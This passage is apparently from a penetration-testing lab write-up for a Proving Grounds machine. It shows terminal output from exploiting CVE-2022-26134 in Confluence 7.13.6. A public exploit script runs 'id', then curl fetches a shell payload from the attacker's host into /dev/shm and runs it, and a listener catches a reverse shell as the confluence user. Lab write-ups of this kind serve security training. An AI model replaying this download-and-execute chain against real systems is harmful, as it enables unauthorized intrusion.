RCE
The target Confluence instance appears to be vulnerable to CVE-2022-26134
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'id'
Confluence target version: 7.13.6
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence) Code execution confirmed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'curl -s http://192.168.45.198/shell -o /dev/shm/shell'
Confluence target version: 7.13.6
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 'chmod 755 /dev/shm/shell'
Confluence target version: 7.13.6
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ python3 cve-2022-26134.py http://$IP:8090 '/dev/shm/shell'
Confluence target version: 7.13.6Transferring & executing the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu/CVE-2022-26134]
└─$ nnc 8091
listening on [any] 8091 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.144.41] 56972
whoami
confluence
hostname
flu
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:08:79 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.144.41/24 brd 192.168.144.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the confluence account via exploiting CVE-2022-26134